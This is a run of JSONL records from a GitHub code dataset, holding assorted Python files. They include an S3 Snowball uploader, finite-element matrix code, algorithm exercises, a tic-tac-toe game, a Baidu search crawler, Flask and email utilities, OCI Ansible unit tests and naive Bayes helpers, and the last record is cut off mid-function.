upload_mpu(mpu_id, recv_buf.read(), parts_index)\n #parts_index += 1\n #recv_buf.seek(0)\n #recv_buf.truncate(0)\n ###################\n else:\n log_error(org_file,\" does not exist\\n\")\n print (org_file + ' is not exist...............................................\\n')\n print (\"8. final recv_buf size: \" + str(len(recv_buf.getvalue())))\n print('8.1 final recv_buf pos : %s' % recv_buf.tell())\n recv_buf.seek(0,0)\n mpu_parts = upload_mpu(mpu_id, recv_buf.read(), parts_index)\n parts_index += 1\n print (\"8. %s is uploaded\" % key_name)\n complete_mpu(mpu_id, mpu_parts)\n ### print metadata\n meta_out = s3.head_object(Bucket=bucket_name, Key=key_name)\n print ('\\n\\n metadata info: %s' % str(meta_out)) \n log_success(str(meta_out), '!!\\n')\n print (\"\\n\\n tar file: %s\" % key_name)\n log_success(key_name, ' is uploaded successfully\\n')\n\nif __name__ == \"__main__\":\n if len(sys.argv) != 2:\n print (\"Usage: %s genlist | cp_snowball | help\" % sys.argv[0]) \n sys.exit()\n elif sys.argv[1] == \"genlist\":\n gen_filelist()\n elif sys.argv[1] == \"cp_snowball\":\n source_files = os.listdir(filelist_dir)\n for sf in source_files:\n error_file = ('error_%s_%s.log' % (sf, current_time))\n successlog_file = ('success_%s_%s.log' % (sf, current_time))\n source_file = os.path.join(filelist_dir, sf)\n org_files_list = open(source_file, encoding='utf8').readlines()\n target_files_list = org_files_list\n #line_break = int(len(org_files_list) / tarfiles_one_time + 1)\n #final_line_list = [ i*int(tarfiles_one_time)-1 for i in range(1,line_break)]\n #final_line_list.append(len(org_files_list)-1)\n key_name = ('snowball-%s-%s.tar' % (sf[:-4], current_time))\n copy_to_snowball(org_files_list, target_files_list)\n parts = []\n else:\n print (\"Usage: %s 'genlist | cp_snowball | help'\" % sys.argv[0])\n","repo_name":"hatsari/article","sub_path":"aws/s3_snowball/working/snowball_uploader_13_almost_success.py","file_name":"snowball_uploader_13_almost_success.py","file_ext":"py","file_size_in_byte":10032,"program_lang":"python","lang":"en","doc_type":"code","stars":30,"dataset":"github-code","pt":"38"} +{"seq_id":"28140688163","text":"import sympy\n\nfrom numpy import array as array\nfrom numpy import mat as mat\nfrom numpy import zeros as zeros\nfrom numpy.linalg import det as det\n\nfrom math import sqrt as sqrt\n\nnum_term = 3\n\na = sympy.symarray(\"a\",num_term)\nb = sympy.symarray(\"b\",num_term)\n\nr,s = sympy.symbols(\"r, s\")\nmonomials = array([1,r,s])\n\nert = a.dot(monomials)\nest = b.dot(monomials)\neqt = sqrt(0.5)*(est-ert)\n\nnum_equation = 6\neq_array = sympy.symarray(\"temp\", num_equation)\n\neq_array[0] = ert.subs([(r,0), (s,0)])\neq_array[1] = ert.subs([(r,1), (s,0)])\neq_array[2] = est.subs([(r,0), (s,0)])\neq_array[3] = est.subs([(r,0), (s,1)])\neq_array[4] = eqt.subs([(r,1), (s,0)])\neq_array[5] = eqt.subs([(r,0), (s,1)])\n\n\nnum_variable = a.size + b.size\n\nx = sympy.symarray(\"temp\", num_variable)\nfor i in range(0, a.size):\n x[i] = a[i]\nfor i in range(0, b.size):\n x[i + a.size] = b[i]\n\nA = mat(zeros((num_equation,num_variable)))\nfor i in range (0,num_equation) : \n eq = eq_array[i] \n for j in range (0, num_variable) :\n target_variable = x[j]\n A[i, j] = eq.coeff(target_variable)\n\nprint(det(A))\n\n# mrt, mst, mqt = sympy.symbols(\"mrt, mst, mqt\")\n# b = array([mrt, mrt, mst, mst, mqt, mqt])\n# b = mat(b).T\n\n# x = A.I * b\n# print(x)\n\n\n\n\n\n# er1,es2,er3,es3 = sympy.symbols(\"er1 es2 er3 es3\")\n\n# c = sqrt(0.5)\n\n# A = mat(\n# [[1, 0, 0, 0, 0, 0],\n# [1, 1, 0, 0, 0, 0],\n# [0, 0, 0, 1, 0, 0],\n# [0, 0, 0, 1, 0, 1], \n# [-c, -c, 0, c, c, 0],\n# [-c, 0, -c, c, 0, c]\n# ])\n\n# A_inv = inv(A)\n\n# b = mat([[er1],[er1],[es2],[es2],[c*(es3-er3)],[c*(es3-er3)]])\n\n# print(A_inv * b)","repo_name":"rla523at/Study","sub_path":"code/Python/2004_(Lee_&_Bathe)/MITC3.py","file_name":"MITC3.py","file_ext":"py","file_size_in_byte":1598,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"74844206830","text":"from plotutils import *\nfrom vidutils import load_video_frames, get_face_probs\nfrom audioutils import get_audio_probs\nfrom tensorflow import keras\nimport joblib\nimport numpy as np\nimport argparse\nimport os\nimport warnings\n\n\ndef get_current_aud_prob(ts, aud_probs):\n for key in aud_probs:\n if ts >= key:\n return aud_probs[key]\n\n\ndef get_vid_probs(aud_probs, face_probs, timestamps, theta=.5):\n vid_probs = []\n for ts, face_prob in zip(timestamps, face_probs):\n aud_prob = get_current_aud_prob(ts, aud_probs)\n if face_prob is not None:\n vid_probs.append(theta * face_prob + (1-theta) * aud_prob)\n else:\n vid_probs.append(aud_prob)\n return vid_probs\n\n\ndef main(vidpath, resultspath, resultname):\n vmodel = keras.models.load_model('assets/keras_vgg19_84acc.h5')\n amodel = joblib.load('assets/audio_mlp_classifier.joblib')\n frames, faces, timestamps = load_video_frames(vidpath, skip=10)\n face_probs = get_face_probs(vmodel, faces)\n aud_probs = get_audio_probs(amodel, vidpath)\n print('aud_probs', aud_probs)\n print('face_probs', face_probs)\n probs = get_vid_probs(aud_probs, face_probs, timestamps) # [.2, .3, ...]\n leveled_probs = smooth_probs(probs, 3, 1)\n title = get_basename(vidpath)\n savepath = os.path.join(resultspath, resultname or title)\n tsplot(timestamps, probs, savepath + '.jpg')\n show_frames(probs, frames, savepath + '_frames.png')\n tsjson(timestamps, leveled_probs, savepath + '.json')\n\n\n# get vidpath, resultspath from command line if provided, else default\ndef parseargs():\n parser = argparse.ArgumentParser(\n description='Demo for shouting action recognition in videos.')\n parser.add_argument('--vidpath', help='The path to an .mp4 file.')\n parser.add_argument(\n '--resultspath', help='The path to a folder to store the results of analysis.')\n parser.add_argument(\n '--resultname', help='The base name of the result files to be generated. If none, use vidname.')\n args = parser.parse_args()\n vidpath = args.vidpath or './videos/demo.mov'\n resultspath = args.resultspath or './results'\n resultname = args.resultname or None\n return vidpath, resultspath, resultname\n \n\n\nif __name__ == '__main__':\n vidpath, resultspath, resultname = parseargs()\n assert os.path.exists(vidpath), 'Video path does not exist'\n assert os.path.exists(resultspath), 'Results path does not exist'\n main(vidpath, resultspath, resultname)\n","repo_name":"josiahcoad/ActionRecognition","sub_path":"demo/demo.py","file_name":"demo.py","file_ext":"py","file_size_in_byte":2506,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"39658506898","text":"#!/usr/bin/env python\n\ndef longestCommonSubsequence(text1: str, text2: str) -> int:\n m = len(text1) \n n = len(text2)\n dp = [[0 for i in range(n + 1)] for j in range(m + 1)]\n\n for i in range(1, m + 1):\n for j in range(1, n + 1):\n if text1[i - 1] == text2[j - 1]:\n dp[i][j] = dp[i - 1][j - 1] + 1\n else:\n dp[i][j] = max(dp[i - 1][j], dp[i][j - 1])\n \n return dp[-1][-1]\n\nif __name__ == '__main__':\n x = \"abcde\"\n y = \"ace\"\n print(\"The longest common subsequence length of the input strings is: \")\n print(longestCommonSubsequence(x, y))","repo_name":"ymtowya/CS5800-code","sub_path":"assign9/as9_1.py","file_name":"as9_1.py","file_ext":"py","file_size_in_byte":620,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"11499610944","text":"from types import SimpleNamespace\n\n\ndef get_default_configs():\n cfg = SimpleNamespace(**{})\n cfg.model_dir = 'models/'\n\n cfg.device = 'cuda:0'\n cfg.batch_size = 32\n cfg.num_workers = 4\n cfg.base_lr = 5e-5\n cfg.warmup_factor = 10\n cfg.num_epochs = 50\n cfg.folds_to_run = [0]\n cfg.patience = 10\n cfg.seed = 67\n cfg.amp = True\n\n cfg.ver_note = 'v1'\n cfg.sample = None\n\n cfg.backbone = 'tf_efficientnet_b3_ns'\n cfg.backbone_pretrained = True\n\n return cfg\n","repo_name":"gallegi/AnyCV","sub_path":"commons/configs.py","file_name":"configs.py","file_ext":"py","file_size_in_byte":502,"program_lang":"python","lang":"tr","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"38102664538","text":"\"\"\" Valid Mountain Array\nGiven an array of integers arr, return true if and only if it is a valid mountain array.\n\nRecall that arr is a mountain array if and only if:\n\narr.length >= 3\nThere exists some i with 0 < i < arr.length - 1 such that:\narr[0] < arr[1] < ... < arr[i - 1] < arr[i]\narr[i] > arr[i + 1] > ... > arr[arr.length - 1]\n\n##### Solution\nWe can use two pointers for this problem one starting from left and one from right. We loop over the entire array\nand increase the left index when arr[left+1]>index[left] and decrease the right index by one when arr[right-1]>index[right].\nAt the end when left is equal to right and both are not zero, it is a valid mountain array. We do not want\neither left or right to be zero at the end because it means that the values did not increase.\n\"\"\"\n\n\nclass Solution:\n def validMountainArray(self, arr) -> bool:\n # start a left pointer and a right pointer\n left, right = 0, len(arr) - 1\n # loop over each element in the array\n for i in range(len(arr)):\n # if the array is increasing from left, increase the left by one\n if arr[left + 1] > arr[left]:\n left += 1\n # if the array is increasing from right, decrease the right by one\n if arr[right - 1] > arr[right]:\n right -= 1\n # if left and right are the same and are not zero, it is a valid mountain\n return left == right and not (left == 0 or right == 0)","repo_name":"RustamyF/data-structure-Python","sub_path":"src/algostructure/arrays/code/valid_mountain.py","file_name":"valid_mountain.py","file_ext":"py","file_size_in_byte":1476,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"37324235096","text":"from random import randrange\n\n\ndef DisplayBoard(board):\n#\n# the function accepts one parameter containing the board's current status\n# and prints it out to the console\n# \n print('+-------+-------+-------+')\n print('| | | |')\n print('| {} | {} | {} |'.format(board[0][0],board[0][1],board[0][2]))\n print('| | | |')\n print('+-------+-------+-------+')\n print('| | | |')\n print('| {} | {} | {} |'.format(board[1][0],board[1][1],board[1][2]))\n print('| | | |')\n print('+-------+-------+-------+')\n print('| | | |')\n print('| {} | {} | {} |'.format(board[2][0],board[2][1],board[2][2]))\n print('| | | |')\n print('+-------+-------+-------+')\n\n\ndef EnterMove(board):\n#\n# the function accepts the board current status, asks the user about their move, \n# checks the input and updates the board according to the user's decision\n#\n free_squares = MakeListOfFreeFields(board)\n user = int(input('Select the Box to mark : '))\n if 0 < user <10:\n if free_squares[user-1] == 'R':\n print('Box alreay Occopied. Select another')\n else:\n i,j = free_squares[user-1]\n board[i][j] = 'O'\n return board \n\n\ndef MakeListOfFreeFields(board):\n#\n# the function browses the board and builds a list of all the free squares; \n# the list consists of tuples, while each tuple is a pair of row and column numbers\n#\n free_squares = list()\n for i in range(3):\n for j in range(3):\n if board[i][j] == 'X' or board[i][j] == 'O':\n free_squares.append('R')\n else:\n free_squares.append((i,j))\n #print(free_squares)\n return free_squares\n\n\ndef VictoryFor(board, sign):\n#\n# the function analyzes the board status in order to check if \n# the player using 'O's or 'X's has won the game\n# \n check = True\n count = 0\n\n combinations = [\n [(0,0),(0,1),(0,2)],\n [(1,0),(1,1),(1,2)],\n [(2,0),(2,1),(2,2)],\n [(0,0),(1,0),(2,0)],\n [(0,1),(1,1),(2,1)],\n [(0,2),(1,2),(2,2)],\n [(0,0),(1,1),(2,2)],\n [(0,2),(1,1),(2,0)]\n ]\n\n for row in combinations:\n for pair in row:\n i,j = pair\n if board[i][j] == sign:\n count += 1\n if count == 3:\n check = False\n break \n else:\n count = 0\n count = 0\n\n if check == False and sign == 'X':\n print('Computer Won!')\n elif check == False and sign == 'O':\n print('You Won!')\n return check\n \n \"\"\"\n #check Rows\n for i in range(3):\n for j in range(3):\n if board[i][j] == sign:\n count += 1\n if count == 3:\n check = False\n break \n else:\n count = 0\n #check Columns\n for i in range(3):\n for j in range(3):\n if board[j][i] == sign:\n count += 1\n if count == 3:\n check = False\n break \n else:\n count = 0\n\n #check left middles\n for i in range(3):\n for j in range(i,i+1):\n if board[i][j] == sign:\n count += 1\n if count == 3:\n check = False\n break \n else:\n count = 0\n\n #check Right middles\n \n for i in range(2,-1,-1):\n for j in range():\n if board[i][j] == sign:\n count += 1\n if count == 3:\n check = False\n break \n else:\n count = 0\n\"\"\"\n \ndef DrawMove(board):\n#\n# the function draws the computer's move and updates the board\n#\n if type(board[1][1]) == int:\n board[1][1] = 'X'\n else:\n free_squares = MakeListOfFreeFields(board)\n while True:\n comp = randrange(10)\n if free_squares[comp-1] == 'R':\n continue\n else:\n i,j = free_squares[comp-1]\n board[i][j] = 'X'\n return board\n return board\n \n\ndef main():\n count = 0\n board = [[1,2,3],[4,5,6],[7,8,9]]\n check = True \n while check and count < 4: \n board = DrawMove(board)\n check = VictoryFor(board, 'X')\n DisplayBoard(board)\n \n #if computer win no need to take user input so use continue\n if check == False:\n continue\n board = EnterMove(board)\n check = VictoryFor(board, 'O')\n \n #if use wins dispaly the Board\n if check == False:\n DisplayBoard(board)\n count +=1 \n \n #if no one wins and turns completed then display the board\n if count == 4:\n DisplayBoard(board)\n \nif __name__ == \"__main__\":\n main()\n\n","repo_name":"SnRahman/MY-Codes","sub_path":"tic_toc_toe.py","file_name":"tic_toc_toe.py","file_ext":"py","file_size_in_byte":5015,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"26177074158","text":"import unittest\n\nimport dwd\n\n\nclass DWDTest(unittest.TestCase):\n def testFormatStationFilename(self):\n formatted_string = dwd.format_station_filename(\"00001\")\n self.assertEqual(\"tageswerte_KL_00001_\", formatted_string)\n\n\nif __name__ == \"__main__\":\n unittest.main()\n","repo_name":"Dens49/dwd-weather-stats","sub_path":"dwd_test.py","file_name":"dwd_test.py","file_ext":"py","file_size_in_byte":285,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"18699581623","text":"from sklearn.preprocessing import MinMaxScaler\nfrom sklearn.datasets import load_iris\n\ndata = load_iris().data\nmms_transfer = MinMaxScaler()\n\"\"\"\n标准化公式:x' = (x-min) / (max-min)\n-------------下面介绍一下几个MinMaxScaler()对象的常用方法-------------\nfit(): 代入数据训练模型\nfit_transform(): 先使用fit的方法,在使用transform的方法,即把数据放入后直接返回标准化后的数据\n\n- 在进行.fit()之后,可以调用以下方法:\n.data_max_: 每个特征的最大值\n.data_min_: 每个特征的最小值\ntransform: 利用训练好的标准化模型对数据集进行标准化\nget_params: 获取模型的参数\ninverse_transform: 逆标准化,即将标准化后的数据集变为原来未处理的形式\n\"\"\"\nmms_transfer.fit(data) # 代入数据训练模型\nprint(f\"数据集每个特征的最大值为:{mms_transfer.data_max_}\")\nprint(f\"数据集每个特征的最小值为:{mms_transfer.data_min_}\")\nprint(f\"标准化的参数为:{mms_transfer.get_params()}\")\ndata_mms = mms_transfer.transform(data) # 用训练好的模型对数据进行标准化\n\n# 如果只需要对数据进行标准化,以下步骤更为简洁:\nmms_transfer = MinMaxScaler()\ndata_transfer = mms_transfer.fit_transform(data) # 调用标准化模型,将数据转化\nprint(f\"标准化后的数据为:{data_transfer}\")\n","repo_name":"Korcat/Machine_Learning","sub_path":"数据预处理/离差标准化.py","file_name":"离差标准化.py","file_ext":"py","file_size_in_byte":1370,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"23068109348","text":"import numpy as np\ndef shift(x, k, l, boundary):\n if x.ndim == 2:\n color = 1\n else :\n color = 3\n n1 = np.shape(x)[0]\n n2 = np.shape(x)[1]\n xshifted = np.zeros((n1,n2,color))\n irange = np.mod(np.arange(n1) + k, n1)\n jrange = np.mod(np.arange(n2) + l, n2)\n # firstly move upward then move rightward\n xshifted = x[irange, :][:, jrange]\n if boundary == 'periodical':\n pass\n elif boundary is 'extension':\n m = n1 - k if k > 0 else -k-1\n n = n2 - l if l > 0 else -l-1\n if k != 0:\n xshifted[m::np.sign(k),:,:] = np.tile(xshifted[m-np.sign(k):m-np.sign(k)+1,:,:],(np.sign(k)*k,1,1))\n if l != 0:\n xshifted[:,n::np.sign(l),:] = np.tile(xshifted[:,n-np.sign(l):n-np.sign(l)+1,:],(1,np.sign(l)*l,1))\n elif boundary == 'zero-padding':\n period = xshifted\n xshifted = np.zeros_like(period)\n m = n1 - k if k > 0 else -k-1\n n = n2 - l if l > 0 else -l-1 \n sign_k = np.sign(k) if k != 0 else 1 \n sign_l = np.sign(l) if l != 0 else 1\n if k == 0:\n m = n1\n if l == 0:\n n = n2\n xshifted[:m:sign_k,:n:sign_l,:] = period[:m:sign_k,:n:sign_l,:]\n # mirror\n else:\n m = n1 - k if k > 0 else -k\n n = n2 - l if l > 0 else -l\n add_k = 1 if k < 0 else 0\n add_l = 1 if l < 0 else 0\n if k != 0:\n xshifted[m::np.sign(k),:,:] = xshifted[min(m,m-k):max(m,m-k) + add_k,:,:][::-np.sign(k),:,:]\n if l != 0:\n xshifted[:,n::np.sign(l),:] = xshifted[:,min(n,n-l):max(n,n-l) + add_l ,:][:,::-np.sign(l),:]\n return xshifted\n","repo_name":"shoachia/nlmeans","sub_path":"shift.py","file_name":"shift.py","file_ext":"py","file_size_in_byte":1645,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"38"} +{"seq_id":"9158407173","text":"import os\nfrom pdfProcess import list_reform\nfrom pdfProcess import testclip\n\n\ndef zhihmulu2txt(path):\n f = open(path+\"re.zhi2txt1\", encoding=\"utf-8\")\n f2 = open(path+\"re.zhi2txt2\", \"w\", encoding=\"utf-8\")\n linelist = f.readlines()\n for line in linelist:\n if line[0] == \"угг\":\n f2.write(\"# \"+line+\"\\n\")\n f2.write(line+\"\\n\")\n f.close\n f2.close()\n\n\nif __name__ == '__main__':\n path = os.getcwd()+\"/\"\n testclip.copy_text_from_clip(path, \"zhi2txt1\")\n zhihmulu2txt(path)\n","repo_name":"jiangnanqw12/testCode","sub_path":"004_text_process/zhi2txt.py","file_name":"zhi2txt.py","file_ext":"py","file_size_in_byte":521,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"32813618881","text":"# 제목 : 동전 1\n# 분류 : DP, Gold 5\n# 출처 : 백준 2293\n\nn, k = map(int, input().split())\ncoin = [int(input()) for _ in range(n)]\n\ndp = [0] * (k+1)\ndp[0] = 1\n\nfor c in coin:\n for i in range(c, k+1):\n dp[i] += dp[i - c]\n\nprint(dp[k])","repo_name":"41ow1ives/1day2solve","sub_path":"kyounghyeon/BOJ/DP/2293.py","file_name":"2293.py","file_ext":"py","file_size_in_byte":251,"program_lang":"python","lang":"ko","doc_type":"code","stars":3,"dataset":"github-code","pt":"38"} +{"seq_id":"42363016","text":"from flask import Flask\nfrom flask_cors import CORS\n\nfrom app.auth.controllers import auth as auth_module, init_jwt\n\n# Define the WSGI application object\n\napp = Flask(__name__)\n\ndef setup_app(app):\n CORS(app)\n\n # Configurations\n app.config.from_object('config')\n\n # Sample HTTP error handling\n @app.errorhandler(404)\n def not_found(error):\n return 'Not found', 404\n\n # Register blueprint(s)\n app.register_blueprint(auth_module)\n init_jwt(app)\n\n","repo_name":"r3mariano/flask-cognito-auth-jwt","sub_path":"app/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":478,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"26875804281","text":"import time\nimport logging\nimport datetime\nimport re\n\nimport html2text\nfrom django.core.mail import EmailMultiAlternatives\nfrom django.conf import settings\nfrom django.template.loader import render_to_string\nfrom django.utils import timezone\n\nfrom djapp import models\n\n\nlogger = logging.getLogger(__name__)\n\n\n\nclass Email:\n def __init__(self, key):\n self.key = key\n\n def _apply_whitelist(self, to):\n whitelist = settings.EMAIL_WHITELIST\n # Apply whitelist\n if whitelist is not None:\n whitelist = whitelist + ['@example.com']\n l = []\n for email in to:\n for allowed_email in whitelist:\n if allowed_email == email or (allowed_email.startswith('@') and email.endswith(allowed_email)):\n l.append(email)\n break\n else:\n logger.info('Skip mail %s: Not in whitelist', email)\n to = l\n return list(set(to))\n\n def send(self, to, context, from_email=None):\n if isinstance(to, str):\n to = [to]\n\n orig_to = to\n to = self._apply_whitelist(to)\n if not to:\n logger.info('Nothing to send. To: before whitelist: %s', orig_to)\n return\n\n # render\n subject = self.render('emails/' + self.key + '_subject.html', context)\n subject = subject.replace('\\n', ' ').replace('\\r', ' ').strip()\n body_html = self.render('emails/' + self.key + '_body.html', context)\n body_text = html2text.html2text(body_html)\n\n msg = EmailMultiAlternatives(\n subject=subject,\n from_email=from_email,\n to=to,\n body=body_text,\n reply_to=['conseiller-numerique@anct.gouv.fr'],\n )\n msg.attach_alternative(body_html, 'text/html')\n logger.info('Send email to %s, from %r, key=%r, subject: %s', to, from_email, self.key, subject)\n msg.send()\n\n def render(self, template_name, context):\n return render_to_string(template_name, context)\n","repo_name":"anct-cnum/conseiller-numerique","sub_path":"back/djapp/utils/emails.py","file_name":"emails.py","file_ext":"py","file_size_in_byte":2077,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"38022626344","text":"import os.path\nimport random\nfrom urllib import parse\nfrom urllib import request\nfrom ua_info import ua_list\n\n\ndef get_url(word):\n query_string = {\n 'wd': word\n }\n\n url = \"http://www.baidu.com/s?{}\".format(parse.urlencode(query_string))\n return url\n\n\ndef request_url(url, fileName):\n headers = {\n 'User-Agent': random.sample(ua_list, 1)[0]\n }\n req = request.Request(url=url, headers=headers)\n res = request.urlopen(req)\n html = res.read().decode('utf-8')\n with open(fileName, 'w', encoding='utf-8') as f:\n f.write(html)\n\n\ndef generateFileName(savePath, fileName):\n fileName = os.path.join(savePath, fileName + \".html\")\n return fileName\n\n\nif __name__ == \"__main__\":\n word = \"色图\"\n path = \"/Users/yifanhuang/PycharmProjects/pythonProject/crawler/tutorial/result\"\n request_url(get_url(word), generateFileName(path, \"result1.1\"))\n","repo_name":"yifanHuang129/Crawler_learning","sub_path":"exercise1.1.py","file_name":"exercise1.1.py","file_ext":"py","file_size_in_byte":895,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"13279519459","text":"import pytest\nfrom nose.plugins.skip import SkipTest\nfrom ansible.module_utils import six\nfrom ansible.module_utils.oracle import oci_utils\nfrom ansible.modules.cloud.oracle import oci_app_catalog_subscription_facts\n\ntry:\n import oci\n from oci.util import to_dict\n from oci.core.models import AppCatalogSubscription\n from oci.exceptions import ServiceError\nexcept ImportError:\n raise SkipTest(\"test_oci_app_catalog_subscription_facts.py requires `oci` module\")\n\n\nclass FakeModule(object):\n def __init__(self, **kwargs):\n self.params = kwargs\n\n def fail_json(self, *args, **kwargs):\n self.exit_args = args\n self.exit_kwargs = kwargs\n raise Exception(kwargs[\"msg\"])\n\n def exit_json(self, *args, **kwargs):\n self.exit_args = args\n self.exit_kwargs = kwargs\n\n\n@pytest.fixture()\ndef compute_client(mocker):\n mock_compute_client = mocker.patch(\"oci.core.compute_client.ComputeClient\")\n return mock_compute_client.return_value\n\n\n@pytest.fixture()\ndef list_all_resources_patch(mocker):\n return mocker.patch.object(oci_utils, \"list_all_resources\")\n\n\n@pytest.fixture()\ndef call_with_backoff_patch(mocker):\n return mocker.patch.object(oci_utils, \"call_with_backoff\")\n\n\ndef get_app_catalog_subscription(**kwargs):\n app_catalog_subscription = AppCatalogSubscription(\n compartment_id=\"ocid1.compartment.oc1..xxxxxEXAMPLExxxxx\",\n listing_id=\"ocid1.appcataloglisting.oc1..xxxxxEXAMPLExxxxx\",\n listing_resource_version=\"1.0\",\n )\n for attr, val in six.iteritems(kwargs):\n setattr(app_catalog_subscription, attr, val)\n return app_catalog_subscription\n\n\ndef get_app_catalog_subscriptions():\n return [\n get_app_catalog_subscription(\n compartment_id=\"ocid1.compartment.oc1..xxxxxEXAMPLExxxxx\",\n listing_id=\"ocid1.appcataloglisting.oc1..xxxxxEXAMPLExxxxx1\",\n listing_resource_version=\"1.0\",\n ),\n get_app_catalog_subscription(\n compartment_id=\"ocid1.compartment.oc1..xxxxxEXAMPLExxxxx\",\n listing_id=\"ocid1.appcataloglisting.oc1..xxxxxEXAMPLExxxxx2\",\n listing_resource_version=\"1.0\",\n ),\n ]\n\n\ndef get_module(**kwargs):\n params = {\"compartment_id\": \"ocid1.compartment.oc1..xxxxxEXAMPLExxxxx\"}\n params.update(kwargs)\n module = FakeModule(**params)\n return module\n\n\ndef get_response(status=200, headers=None, data=None, request=None):\n if not headers:\n headers = dict()\n return oci.Response(status, headers, data, request)\n\n\ndef test_list_app_catalog_subscriptions_raises_service_error(\n compute_client, list_all_resources_patch\n):\n list_all_resources_patch.side_effect = ServiceError(\n 500, \"InternalServerError\", dict(), \"Internal Server Error\"\n )\n with pytest.raises(ServiceError) as exc_info:\n oci_app_catalog_subscription_facts.list_app_catalog_subscriptions(\n compute_client, get_module()\n )\n se = exc_info.value\n assert se.status == 500\n assert se.code == \"InternalServerError\"\n assert se.message == \"Internal Server Error\"\n\n\ndef test_list_app_catalog_subscriptions_when_no_subscriptions_exist(\n compute_client, list_all_resources_patch\n):\n module = get_module()\n list_all_resources_patch.return_value = []\n result = oci_app_catalog_subscription_facts.list_app_catalog_subscriptions(\n compute_client, module\n )\n list_all_resources_patch.assert_called_once()\n list_all_resources_patch.assert_called_with(\n compute_client.list_app_catalog_subscriptions,\n compartment_id=module.params[\"compartment_id\"],\n )\n assert len(result) == 0\n\n\ndef test_list_app_catalog_subscriptions_when_subscriptions_exist(\n compute_client, list_all_resources_patch\n):\n module = get_module()\n app_catalog_subscriptions = get_app_catalog_subscriptions()\n list_all_resources_patch.return_value = app_catalog_subscriptions\n result = oci_app_catalog_subscription_facts.list_app_catalog_subscriptions(\n compute_client, module\n )\n list_all_resources_patch.assert_called_once()\n list_all_resources_patch.assert_called_with(\n compute_client.list_app_catalog_subscriptions,\n compartment_id=module.params[\"compartment_id\"],\n )\n assert len(result) == 2\n\n\ndef test_list_app_catalog_subscriptions_filter_by_listing_id(\n compute_client, list_all_resources_patch\n):\n listing_id = \"ocid1.appcataloglisting.oc1..xxxxxEXAMPLExxxxx\"\n module = get_module(listing_id=listing_id)\n app_catalog_subscription = get_app_catalog_subscription(listing_id=listing_id)\n list_all_resources_patch.return_value = [app_catalog_subscription]\n result = oci_app_catalog_subscription_facts.list_app_catalog_subscriptions(\n compute_client, module\n )\n assert len(result) == 1\n assert result[0][\"compartment_id\"] == app_catalog_subscription.compartment_id\n assert result[0][\"listing_id\"] == app_catalog_subscription.listing_id\n list_all_resources_patch.assert_called_with(\n compute_client.list_app_catalog_subscriptions,\n compartment_id=module.params[\"compartment_id\"],\n listing_id=listing_id,\n )\n","repo_name":"oracle/oci-ansible-modules","sub_path":"test/units/test_oci_app_catalog_subscription_facts.py","file_name":"test_oci_app_catalog_subscription_facts.py","file_ext":"py","file_size_in_byte":5169,"program_lang":"python","lang":"en","doc_type":"code","stars":105,"dataset":"github-code","pt":"38"} +{"seq_id":"8699218791","text":"from sklearn.naive_bayes import GaussianNB\nfrom sklearn.neighbors import KNeighborsClassifier\nfrom sklearn.svm import SVC, LinearSVC\nimport numpy as np\nfrom glob import glob\nimport os \nfrom sklearn.model_selection import KFold\nfrom torch import optim\nimport torch \nimport torchvision\nimport torch.nn as nn \nimport time\nfrom sklearn.neural_network import MLPClassifier\nfrom sklearn.base import BaseEstimator, ClassifierMixin\nfrom sklearn.metrics import accuracy_score\nfrom sklearn.model_selection import cross_val_score\n\n\ndef evaluate_classifier(clf, X, y, folds=5):\n\t\"\"\"\n\t\tReturns the 5-fold accuracy for classifier clf on X and y\n\t\tArgs:\n\t\t\tclf (sklearn.base.BaseEstimator): classifier\n\t\t\tX (np.ndarray): Digits data (nsamples x nfeatures)\n\t\t\ty (np.ndarray): Labels for dataset (nsamples)\n\t\tReturns:\n\t\t\t(float): The 5-fold classification score (accuracy)\n\t\t\t\n\t\"\"\"\n\tscores = cross_val_score(clf, X, y,cv=KFold(n_splits=5),scoring=\"accuracy\", n_jobs=-1)\n\treturn np.mean(scores)\n\n\ndef calculate_priors(X, y):\n\t\"\"\"Return the a-priori probabilities for every class\n\tArgs:\n\t\tX (np.ndarray): Digits data (nsamples x nfeatures)\n\t\ty (np.ndarray): Labels for dataset (nsamples)\n\tReturns:\n\t\t(np.ndarray): (n_classes) Prior probabilities for every class\n\t\"\"\"\n\toccurances = [0]*len(set(y))\n\tfor label in y :\n\t\toccurances[label]+=1\n\treturn np.asarray(list(map(lambda x: x/len(y),occurances)))\n\ndef gauss_prob(x,mean,var):\n\tif var==0:\n\t\tvar=1e-9\n\tprob = -( np.square(x-mean)/(2*var)) - 0.5*np.log(2*np.pi*var)\n\treturn prob\n \ndef digit_mean(X, y, digit):\n\t'''Calculates the mean for all instances of a specific digit\n\tArgs:\n\t\tX (np.ndarray): Digits data (nsamples x nfeatures)\n\t\ty (np.ndarray): Labels for dataset (nsamples)\n\t\tdigit (int): The digit we need to select\n\tReturns:\n\t\t(np.ndarray): The mean value of the digits for every pixel\n\t'''\n\n\tdigit_indices = []\n\tmean = []\n\tfeature_values = []\n\tfor i,label in enumerate(y) :\n\t\tif label == digit :\n\t\t\tdigit_indices.append(i)\n\n\tfor i in range(len(X[0])):\n\t\t# gather same feature of all digit samples in order to calculate their mean value\n\t\tfor index in digit_indices:\n\t\t\tfeature_values.append(X[index,i])\n\n\t\t# save mean value of digit in mean \n\t\tmean.append(np.asarray(feature_values).mean())\n\t\t\n\t\t#reset feature_values as empty 